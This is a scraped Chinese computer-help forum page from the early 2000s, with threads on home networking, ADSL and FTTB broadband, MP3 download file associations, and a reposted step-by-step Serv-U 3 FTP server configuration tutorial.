 发表于 2001-12-19 10:47:12 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
呵呵，晕s~~~~~~~~！我还有更离奇的经历，大家也可以来分析一下原因：

朋友家两台电脑共享一个猫上线。共享代理的主机很稳定，以前一直单独拨号上网，没有任何异常。后来为了废物利用，把废弃的老奔找了出来，简单配置了一些必要的硬件后共享上网，主要就是想用老奔聊聊天。

采用双绞线直接对联，所以双绞线的制作时注意顺序。

老奔虽然慢，但好歹还顺利。装系统、驱动、配置等等，我闭着眼睛就搞掂了，重新启动后，我就准备开始访问代理服务器了。可是，重新启动后居然没有网上邻居！第一反应是网卡驱动不正确，卸载重装，然后所有的配置又仔细核对（凭多年的经验，我不可能出现什么低级的错误），排除任何硬件的冲突，在确定完全没有错误的情况下，我重启，可是……故障依然！！！！

无法访问网络，这是什么原因呢？？我无意中在老奔上ping主机，呵呵，居然是通的！！！我的天，还有这样的事情？我马上开始运用dos工具企图访问主机，依然未果，始终不能知道这是什么原因造成的。好在通讯没有问题，而且可以通过共享代理没有障碍地连接外部网络。没有太多的时间解决这个问题了，呵呵，既然人家的目的达到了，我还深究什么呢？？赶紧闪人拉！扯乎！！

可是，这是什么原因呢？我到现在依然不能解释……

打雷了！下雨了！大家快回家收衣服啊……
AirTree

超级用户
积分：375
发帖：229
来自：帝国时代
注册：2001-12-07
 发表于 2001-12-19 10:52:19 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
blue ，不出你的意料，我这里也没办法访问 www.flashkit.com。看来问题还是没有解决。

打雷了！下雨了！大家快回家收衣服啊……
上一贴 | 下一贴
快速回复 | 主题：我的代理服务器出了什么问题？？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


怎样设置FTP服务器？？

计算机技术
怎样设置FTP服务器？？

上一贴 | 下一贴
发表人 主题: 怎样设置FTP服务器？？
宇宙星云

终级用户
积分：474
发帖：305
来自：广州
注册：2000-12-13
 发表于 2001-12-25 18:47:49 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 收藏该主题供以后查看 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP
我想把自己的机子设置成为FTP服务器。以方便在外时随时随地向自己的电脑上传文件，请教各位大虾方法。谢谢！

┏━━┓∴· oooO Oooo°∴┏━━┓
┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃
┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃
┗━━┛★．° \_) (_/·．★┗━━┛
wx@ay

看不懂
积分：7349
发帖：5076
来自：ay.ha.cn
注册：1999-12-23
 发表于 2001-12-25 20:31:11 wx@ay 的 oicq 是1850777,查看 1850777 的资料 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
随时随地？那你就要有固定IP地址。而且机器不能关哦

装个WIN2K，最好是SERVER版本的。然后开FTP。

Think like a Genius.

忘掉她/忘掉你没有的东西/忘掉别人的东西/忘掉你失去以后就不能再得到地东西/忘掉仇恨/忘掉屈辱/就像犀牛忘记草原/水鸟忘记湖泊/地狱忘记天堂/落叶忘记风/但是我决定不忘掉你

宇宙星云

终级用户
积分：474
发帖：305
来自：广州
注册：2000-12-13
 发表于 2001-12-25 21:53:04 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP
win98行吗？

┏━━┓∴· oooO Oooo°∴┏━━┓
┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃
┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃
┗━━┛★．° \_) (_/·．★┗━━┛
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2001-12-26 17:42:54 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
Serv-U

其实关机也行、ip变也行，只不过这样就不能不间断服务而已。

2smile

活着就好
积分：1622
发帖：1907
来自：SD
注册：2001-05-13
 发表于 2001-12-26 18:19:42 按此观看2smile的个人资料 按此发邮件给2smile 访问2smile的主页 发送悄悄话给2smile 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看2smile的IP
如果没有回定的ip，可以到 www.dns2go.com申请一个username.dns2go.com的域名，然后下载他的客户端软件设置一下就可以了。

然后装个server-u，设置也很简单，给你转一篇文章：

Serv-U 3.0.0.17 使用详解 (转贴)

主要新功能:
* 以 WindowsNT/2000/XP... 的 Service 形式运行, 可以随开机而启动服务
* 把服务器和管理工具分离, 而管理工具可以远程配置 Serv-U 3 的服务器
* 虚拟路径映射 (Virtual path mappings), 可以很方便地把不同分区, 甚至
不同机器上的路径都映射到你想它出现的位置, 对于登录用户来说, 他根本
看不出虚拟映射和实际有什么分别
* 似乎对 DoS (Deny Of Service) 攻击有点对策, 实际应用情况不清楚

主要特性:
* 看来内存比 2.x 占用得多不了多少 (当管理工具没打开时)
* 至少不会比 2.x 慢
* 注册码有点难度, 竟然出了几天都没注册机
更有cracker说它用了 ECC (Elliptic Curves) , 很可能永远都出不了注册机?
现在有的是破解版, 可能有人感觉不太舒服吧?

综上所述, 对于 2.x 的用户来说, 如果没用到主要的新功能, 不换也没什么不好,
但如果想换又不知如何配置, 请看下回分解~~~
原文再续书接上一回, 话说上次说到对于想升级又怕不会用的人, 你可以放心了,
你只要保留你原本 2.x, 升级安装上去, Serv-U 3 就会自动按原设定配置服务器,
根本不用你动手, 所以, 这篇基本上是废话...

欲知重头安装该怎样做, 或想知各种功能的用法, 请看下回分解!
Step #1. 安装
点击安装程序, 直点 Next 就完成了. 没什么好说的.

Step #2. 第一次运行
安装完成后, 服务器的Service会启动, 管理工具会自动运行, 你看到的, 是要你
配置好它的 Setup Wizard... 唔... 基本上 Next 下去就是了, 下面几个可能你
会有兴趣:
Domain name: 域的名字
Allow anonymous access: 要让匿名登录吗? (选 No 可以跳过这部分)
Annoymous home directory: 匿名登录后, 用户会看到的目录
Lock annoymous users into their home directory: 选Yes, 不要让他们乱跑
Create named account: 要建立有非匿名用户吗?
输入用户名, 密码.
(大约和上面过程一样)
Account admin priviledge: 这个用户有远程管理 Serv-U 3 的权限吗?
呵呵. 通常选 No priviledge 吧.
嘿! 基本上搞好了!

Step #3. 认识 Serv-U 3 管理工具的的界面
左边的树状结构是 Serv-U 3 的结构层次:
1. Serv-U Server 下面是管理工具在管理的 FTP,
其中<<Local Server>>就是你机上那个服务器了.

2. 在每个服务器中...
License: 给你填注册码
Settings: 服务器总配置
Activity: 给你监测本服务器的运作情况
Domains: 下面的各个 Domain, 是以你的机器拥有的不同IP开的服务器,
按刚才"第一次运行"来做, 你现在会有一个 Domain 了.

Step #4: 整体配置
在<<Local Server>>的Settings:

General: 总体限制, 参数设置
Max. Speed- 总体限速,
不设的话, 极速可达约 1MBytes/S.
Max no. of users - 同时的连接数目
不要太多, 很伤硬盘的, 建议不超过20
Check Anonymous password - 匿名登陆密码检查,
不要选, 否则 IE 不能进入.
Block Anti Time-out schemes
Block "FTP_bounce"...
主要是把些无聊人赶掉, 都选吧, 细节看 Help
Block users who connect...
随意, 用于"罚"一下用多线程下载的用户.
其馀选项看 Help 吧.

Dir Cache: 目录缓存
用户较多时, 可以明显加快用户浏览的速度,
把它打开, 用默认的 Max.Size 25, Time-out 600 sec. 差不多了.
Auto-Refresh 选取后你会看到在缓存中有哪些目录

Advanced:
Server:
Enable security - 安全设置生效
一定要选上! 否则你会死得很难看. KAKAKA
Sockets:
Inline out-of-band data
选取后听说可以防止 DoS 攻击, 但默认没选, 你自己决定吧.

至于如何配置用户, 就请看下回分解!
原文再续书接上一回, 话说上次说到我们有了个服务器,
但没设好域里的用户, 也是没用的, 所以...

Step #1: 域 (Domain) 配置
在 Domains 下选取你的域吧!
Name: 域的名字
Domain IP address: 为简单起见, "Use any available IP address" 算了吧.
Domain type:
Store in .INI file 比较好,
它把你的服务器的设置都放到 ServUDaemon.ini ,
重装系统后把这文件放上去就行了.
FTP port number:
通常是 21

Settings:
General:
Max no. of users - 同时的连接数目
和上一个差不多, 不过是在域里限制
Virtual path mapping - 请看 VPM 篇
Links - 同上
Messages:
很好玩的, 可以把别人登录看到的信息都改掉.
Logging:
就是 log 啊. 不懂? 看 help!

Step #2: 用户帐号
在 Domains 下...
Users... 右击出现新增/移除用户选单.

点选任一用户后, 各项用户参数意义:

Account:
Disable account: 暂时令它失效
Automatically remove account on date: 到了某日期就删掉该用户! (爽!)
User name: 不用多说吧?
Password: 留空不填代表不用密码
Home directory: 这用户登录时看到的第 1 个目录
Lock user in home directory:
最如想在用这帐号登陆后, 看到的根目录是所设的 Home Directory,
就选吧. (建议选取, 否则地址会比较难看)
Priviledge: 这用户远程管理 Serv-U 服务器的权限, 具体看 HELP

General:
Allow only N login(s) from same IP address
限制同一 IP 用这帐号的连接数, 选了它吧!
如果考虑到用 IE 的用户, 最好设两个连接,
否则对方可能不能下载, 如果狠心点, 设 1 个也没关系!
Max upload Speed.
用这帐号, 每一个连接上传文件的极速.
Max download Speed
用这帐号, 每一个连接下载的极速.
Idle time-out
发呆多久才 kick 他出去, 个人认为 5 分钟都够了.
Sesson time-out
无论他有没有发呆, 上来一段时间后就把他 KICK 走, 即使他在下载
什么东东也照踢不误, 并且在 1 分钟内不让他再上来. 这样在很忙下载
站点中可能有用, 可以让多点人有机会访问, 不过确是有点讨厌. 呵呵
Max. no. of users
这帐号同时允许的总连接数目.
其馀的比较少用, 看 HELP 吧.
Dir Access:
这里设置这用户对你硬盘中, 实际路径的读写权限, 关键哦!
无论是 HOME 目录好, 映射目录也罢. 要让用户用得到, 也要在这里加
具体意义在界面上也很明确吧. 不多说了, 但别忘了.
(记得把 HOME 目录在这里加多一次, files-[read], directories-[list]
这样人家看能看到, 下载到你的东东....)

Step #3: 群组帐号
在 Domains 下...
Groups... 右击出现新增/移除用户选单.

看上去很简单是不是? 对了. 把一个 Group 设置了一点参数,
在任一用户 - Account - Group(s) 中把他加进去, 他就拥有那个参数的权限.
有什么用? 你自己想想吧.

哈哈... 基本上我们都搞好了, 但是重头戏 Virtual path mappings 还没出场,
到底这东东有什么用处, 又是什么设置的呢? 请看下回分解!

原文再续书接上一回, 话说上次说到 Virtal path mappings 就打住不说,
究竟是什么原因呢? 这是因为很多老鸟都对上面几篇一屑不顾, 但却往往
死在 VPM 手上, 但是死在 VPM 的石榴裙下也甘心了. 呵呵....

在 Domains 下...
Settings:
General:
Virtual path mappings:

Step #1: 虚拟路径映射的概念:
1. Physical path: 目录的实际路径
可以是任何Windows分区上任何东东, 甚至网络邻居里的也可以
2. Mapped to: 映射到... (这个目录必须实际存在)
你想把它"变到"你硬盘里的那个目录呢?
你可以用到两个变量:
%HOME% : 即"Home directory"
%USER% : 用户名
3. mapped path name:
这个虚拟目录在显示出来的名字
4. 记得要在各用户的 Dir access 中设置它对实际路径的权限哦!!!!

Step #2: 举例:
1. 你想把 f:\movie\ 映射到匿名登录后看到的 \MyMovie 目录:
Physical path: f:\movie\
Mapped to: %HOME%
mapped path name: MyMovie
在 anonymous 帐号对 f:\movie\ 设 file - read, dir - list 权限
2. 你想把 g:\mp3\ 映射到 alex 登录后看到的 \Audio\MySongs 目录:
Physical path: g:\mp3\
Mapped to: %HOME%\Audio
mapped path name: MySongs
在 alex 帐号对 g:\mp3\ 设 file - read, dir - list 权限

哈哈. 还有封人的方法没说吧? 欲知后事如何, 请看下回分解!
关于多级目录映射的补充。。 来自fiend-smth
有点混乱。。嘿嘿

原文再续书接上一回, 封人对于很多人来说都是很过瘾的事,
所以就有这篇东东了...

Step #1. 按 IP 封
在 Serv-U 中, IP Access 很多地方都有出现, 这就是限制 IP 访问的地方了.
Domain- Settings 里有; 各用户- Settings 里有; 各群组- Settings 里也有.
IP access:
如果要限制 IP, 就在这里设置. 限制是由上到下执行检查的.
这里给出一些例子: (!注意次序!)
1. 只对某几个 IP 开放帐号:
----------------
A: 202.38.241.8
A: 202.38.249.2
A: 202.38.248.3
D: *
----------------
意思是, 对 202.38.241.8 , 202.38.249.2 , 202.38.248.3
开放, 其馀都不准进入
2. 只对一个网段开放:
----------------
A: 202.38.241.*
D: *
-----------------
意思是, 只对 202.38.241.* 开放, 其馀拒绝
3. 只拒绝部分IP
--------------
D: 123.166.*.*
D: 202.38.234.56
A: *
--------------
拒绝 123.166.*.* 的B类网段, 及 202.38.234.56 访问,
其馀都欢迎
看了三个例子, 大家都志该知道 IP 限制如何设置吧,
要注意的一点是, 最后一个限制项目, 最好要设成
A: * (其馀都允许进入) 或
D: * (其馀都不准进入)
否则, 可能会得不到预期中的限制的效果.

Step #2. 看不爽封
如果有个人连了上来, 你看他不爽想封掉他.
在 <<Local Server>> - Activity 或
你的Domain - Activity 会看到他,

右击, KILL USER .............

他在你FTP的命运就在你手中了.

想见不如怀念?
thinktip.com
msn: thinktip@hotmail.com
icq: 98885338
宇宙星云

终级用户
积分：474
发帖：305
来自：广州
注册：2000-12-13
 发表于 2001-12-27 12:57:28 按此观看宇宙星云的个人资料 按此发邮件给宇宙星云 宇宙星云 的 oicq 是365435,查看 365435 的资料 发送悄悄话给宇宙星云 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看宇宙星云的IP
真的好感谢 2smile！！！！！！！！！！！！！！

┏━━┓∴· oooO Oooo°∴┏━━┓
┃拒绝┃°ぎ ( ㊣) ( ㊣)ぎ·┃珍惜┃
┃網戀┃∴☆ \ ( ) / ☆∴┃生命┃
┗━━┛★．° \_) (_/·．★┗━━┛
上一贴 | 下一贴
快速回复 | 主题：怎样设置FTP服务器？？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


关于服务器

计算机技术
关于服务器

上一贴 | 下一贴
发表人 | 主题: 关于服务器
flashdev 初级用户 积分：29 发帖：14 来自： 注册：2001-12-13 | 发表于 2002-01-03 12:19:52 按此观看flashdev的个人资料 按此发邮件给flashdev 收藏该主题供以后查看 发送悄悄话给flashdev 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看flashdev的IP 单位现有有盘电脑30多台，由于工作需要想配台专业服务器。有过使用经验的请推荐推荐一下，顺便贴一下价位及相应的网站介绍。谢了！ 好好学习，天天向上！
大哥 超级用户 积分：318 发帖：111 来自： 注册：2001-12-20 | 发表于 2002-01-03 12:57:12 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP 看实际需求和口袋里的银子，从15000起底，到几十万的都有。 我最近买了台服务器花了35000多，联想的。 PIII 1G × 2， 1G RAM，SCSI 18G×2 RAID。 我原来的服务器是PII266，512M RAM，也能支持并发150个httpd+Mysqld。每天流量20000左右的话感觉不出问题，再大就不行了。 如果只是纯Html，应该能支持100000以上。 老哥我知道的就这么多了。
上一贴 | 下一贴
快速回复 | 主题：关于服务器
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


各位用ADSL要不要拨号啊？

计算机技术
各位用ADSL要不要拨号啊？

上一贴 | 下一贴
发表人 主题: 各位用ADSL要不要拨号啊？
CrazyParty

群山之巅
积分：2164
发帖：811
来自：温州
注册：2000-10-14
 发表于 2001-12-30 16:41:41 按此观看CrazyParty的个人资料 按此发邮件给CrazyParty 收藏该主题供以后查看 发送悄悄话给CrazyParty 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看CrazyParty的IP
我在2000里面什么也没动，只是把网卡和猫连上，就可以上网了，大家呢？
这是怎么回事

这是一个0和1组成的世界，是她的世界，与我的世界截然不同，她的名字叫……
AirTree

超级用户
积分：375
发帖：229
来自：帝国时代
注册：2001-12-07
 发表于 2001-12-31 01:02:00 按此观看AirTree的个人资料 按此发邮件给AirTree AirTree 的 oicq 是894074,查看 894074 的资料 发送悄悄话给AirTree 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看AirTree的IP
ADSL也需要拨号，不过和猫的拨号类型不一样，不需要输入被叫号码，是直接接入虚拟网络，需要的网络协议一般为P.P.P.O.E协议。常用的ADSL专用拨号软件有很多，值得推荐的有：EnterNet 300，RASPPPoE 等，你可以去网上找找。

打雷了！下雨了！大家快回家收衣服啊……
天外飞猪

经典飞猪
积分：2185
发帖：894
来自：HFUU
注册：2001-11-16
 发表于 2001-12-31 21:08:22 按此观看天外飞猪的个人资料 按此发邮件给天外飞猪 发送悄悄话给天外飞猪 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看天外飞猪的IP
ADSL是虚拟拨号

QQ:131433 —— ICQ:134142256 —— MSN:advertisement788@msn.com
I want a degree !
红卫兵

初级用户
积分：4
发帖：1
来自：
注册：2002-02-11
 发表于 2002-02-11 19:48:08 按此观看红卫兵的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给红卫兵 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看红卫兵的IP
这里用到虚拟ip的技术，
其实校园网里的用户一般就是这样上网的
不过各个学校不同，
有的是开机就可以上网，
有的是采用两个ip，一个局域网ip，一个拨号ip，
总之各有个的好处吧
寂寞烟花

超级用户
积分：342
发帖：91
来自：梦飞翔的地方
注册：2001-12-13
 发表于 2002-02-11 21:28:38 按此观看寂寞烟花的个人资料 该用户不允许显示它的电子邮件 访问寂寞烟花的主页 发送悄悄话给寂寞烟花 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看寂寞烟花的IP
我用winpoet，虚拟拨号

曾经向往过的一种自由就象海岸线
可以曲折改变
曾经爱过的一个人象燃烧最强烈最快的火焰
今天晚上
你就用那只酒瓶来支撑自己吗？
黎明之前
让我再做一次那个半死的人
xqlyg

超级用户
积分：366
发帖：93
来自：china
注册：2002-02-07
 发表于 2002-02-11 21:54:36 按此观看xqlyg的个人资料 按此发邮件给xqlyg xqlyg 的 oicq 是41770172,查看 41770172 的资料 发送悄悄话给xqlyg 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看xqlyg的IP
98和xp用的是不同的虚拟拨号要注意哦
上一贴 | 下一贴
快速回复 | 主题：各位用ADSL要不要拨号啊？
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


win2000下载问题

计算机技术
win2000下载问题

上一贴 | 下一贴
发表人 主题: win2000下载问题
DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2002-01-02 10:39:22 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 收藏该主题供以后查看 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
不知道为什么点击下载mp3时弹出的窗口是Windows Media Player，好像是试听似的，怎样解决？？

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2002-01-02 10:58:15 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
文件关联问题
改一下就行
happywalker

高级用户
积分：259
发帖：144
来自：福建省－福州市
注册：2001-02-03
 发表于 2002-01-02 11:51:51 按此观看happywalker的个人资料 按此发邮件给happywalker 访问happywalker的主页 happywalker 的 oicq 是18571576,查看 18571576 的资料 发送悄悄话给happywalker 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看happywalker的IP
没错，我也碰到过类似的问题，点右键，然后选择下载的软件（比如你有NetAnts或者DAP之类)

**********************************

我自横刀向天笑，去留肝胆两昆仑

**********************************

DW5

阻击之眼
积分：2678
发帖：2517
来自：blueidea
注册：2001-07-29
 发表于 2002-01-02 19:36:06 按此观看DW5的个人资料 按此发邮件给DW5 DW5 的 oicq 是48580488,查看 48580488 的资料 发送悄悄话给DW5 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看DW5的IP
Bee007在上个帖子中说
引用:
文件关联问题
改一下就行

怎样改？

永远走在时代的最前端。。。

Blueidea Cs Team
Team Nicker
-]Blueidea[- Y.DW5

张无忌

win1st
管理员
积分：7148
发帖：3108
来自：Blueidea.com
注册：2000-09-10
 发表于 2002-01-02 20:05:12 按此观看张无忌的个人资料 按此发邮件给张无忌 访问张无忌的主页 发送悄悄话给张无忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看张无忌的IP
可以右键链接，选择save as来下载

只用一样东西，不明白它的道理，实在不高明

Blueidea Web Team
Team Member

凌志

终级用户
积分：532
发帖：163
来自：鞍山
注册：2001-01-09
 发表于 2002-01-03 15:35:08 按此观看凌志的个人资料 按此发邮件给凌志 访问凌志的主页 凌志 的 oicq 是5685200,查看 5685200 的资料 发送悄悄话给凌志 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看凌志的IP
右击链接，目标另存为。

网络天下
四海一家
Bee007

高级用户
积分：193
发帖：223
来自：
注册：2000-02-01
 发表于 2002-01-03 17:01:33 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent
资源管理器里头
工具|文件夹选项|文件类型
然后看着办吧。
上一贴 | 下一贴
快速回复 | 主题：win2000下载问题
用户 | 名称： 密码： 忘了密码？
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:


HTTB+Lan宽带的技术内幕？？？

计算机技术
HTTB+Lan宽带的技术内幕？？？

上一贴 | 下一贴
发表人 主题: HTTB+Lan宽带的技术内幕？？？
jax

初级用户
积分：109
发帖：35
来自：
注册：2001-12-31
 发表于 2002-01-01 21:38:03 按此观看jax的个人资料 该用户不允许显示它的电子邮件 收藏该主题供以后查看 发送悄悄话给jax 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jax的IP
谁知道HTTB+Lan的技术方式？
POPOEVER

N个蓝色大泡泡
版主
积分：19175
发帖：5030
来自：Keyframe G.L
注册：2000-07-17
 发表于 2002-01-01 22:00:12 按此观看POPOEVER的个人资料 按此发邮件给POPOEVER 访问POPOEVER的主页 POPOEVER 的 oicq 是54888059,查看 54888059 的资料 发送悄悄话给POPOEVER 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看POPOEVER的IP
是FTTB+LAN吧~~~
是宽带局域网，我家的小区就是用这个~~~

XTree
无可救药地活着，睡眼朦胧地醒着

Blueidea Web Team
Moderator Of DW & JS Forum
Chief Police Officer

jax

初级用户
积分：109
发帖：35
来自：
注册：2001-12-31
 发表于 2002-01-01 22:05:12 按此观看jax的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给jax 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jax的IP
答非所问，偶问技术内幕，比如是不是一定要设置IP，DNSServer，NETGATE等
jax

初级用户
积分：109
发帖：35
来自：
注册：2001-12-31
 发表于 2002-01-01 22:18:15 按此观看jax的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给jax 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jax的IP
另外，他和ADSL比速度，谁快？
ladeng

初级用户
积分：94
发帖：44
来自：山东
注册：2001-09-21
 发表于 2002-01-02 08:58:04 按此观看ladeng的个人资料 按此发邮件给ladeng 访问ladeng的主页 发送悄悄话给ladeng 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看ladeng的IP
jax在上个帖子中说
引用:
答非所问，偶问技术内幕，比如是不是一定要设置IP，DNSServer，NETGATE等

这是直接光纤到大楼的，当然要设置IP啦，用私有网的地址10。0。0。X等，DNS就不用了 。

俺是来学习的：）
大哥

超级用户
积分：318
发帖：111
来自：
注册：2001-12-20
 发表于 2002-01-02 12:04:12 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP
我用电信的FTTB，有正式的固定IP。

对一般用户，IP、DNS、Gateway都是通过DHCP分配的，无须设置。 固定IP的用户才需要自己设置。

实际连接速度上下行对称，5－10Mbps，而号称的是100M。

老哥我知道的就这么多了。
jax

初级用户
积分：109
发帖：35
来自：
注册：2001-12-31
 发表于 2002-01-02 13:19:32 按此观看jax的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给jax 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jax的IP
如何申请固定IP呢？
理论速度偶知道，实际速度呢？比如下载？？？
大哥

超级用户
积分：318
发帖：111
来自：
注册：2001-12-20
 发表于 2002-01-03 13:23:27 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP
可以向电信局申请固定IP，免费的，不过得和他们有一定的关系，我请他们吃了一餐饭，敬了三杯酒才得到3个固定IP，呵呵。。。

实际速度我不是说了吗？ 5－10Mbps，也就是下载速度最大 500KB-1MB左右。我的最快记录是下载一张620多M的CD花了17分钟。不管怎么样，比起10M的LAN来说平均还是慢一半左右，我在本地LAN上传文件都可以稳定在1.2MB/s。

老哥我知道的就这么多了。
幽灵

超级用户
积分：358
发帖：216
来自：上海
注册：2001-02-25
 发表于 2002-01-03 18:33:43 按此观看幽灵的个人资料 按此发邮件给幽灵 幽灵 的 oicq 是15868256,查看 15868256 的资料 发送悄悄话给幽灵 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看幽灵的IP
在小区内是一个内网IP，练到Inernet上就是另外的IP了，我的这个IP一开始就是固定的，可不是通过什么特殊手段得来的哦！
我的上行是10M，一般下载速度都是300～500K/S之间，但是有一次去PCHOME下流氓兔，哇考，3M多的东西居然1秒搞定！FAINT!

上帝会保佑我的，一切都会有的！
大哥

超级用户
积分：318
发帖：111
来自：
注册：2001-12-20
 发表于 2002-01-03 19:20:08 按此观看大哥的个人资料 该用户不允许显示它的电子邮件 访问大哥的主页 发送悄悄话给大哥 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看大哥的IP
嘿嘿，你的是内网IP当然是免费附送的，我的是61开头的地址。

老哥我知道的就这么多了。
jax

初级用户
积分：109
发帖：35
来自：
注册：2001-12-31
 发表于 2002-01-03 19:49:01 按此观看jax的个人资料 该用户不允许显示它的电子邮件 发送悄悄话给jax 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看jax的IP
偶考虑了很久，认为目前的HTTB+Lan宽带分为2种，一是有固定IP，需要设置IP，DNS的，另一种是无固定IP，不需要设置IP，DNS，后一种是基于VLAN（虚拟局域网）技术，利用Switch的Port分配不同的VLAN网段，大家认为呢？
張無忌

高级用户
积分：263
发帖：147
来自：
注册：2001-04-24
 发表于 2002-01-03 20:12:00 按此观看張無忌的个人资料 按此发邮件给張無忌 访问張無忌的主页 張無忌 的 oicq 是1236541,查看 1236541 的资料 发送悄悄话给張無忌 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看張無忌的IP
jax在上个帖子中说
引用:
偶考虑了很久，认为目前的HTTB+Lan宽带分为2种，一是有固定IP，需要设置IP，DNS的，另一种是无固定IP，不需要设置IP，DNS，后一种是基于VLAN（虚拟局域网）技术，利用Switch的Port分配不同的VLAN网段，大家认为呢？

这个也算HTTB+Lan的技术内幕？

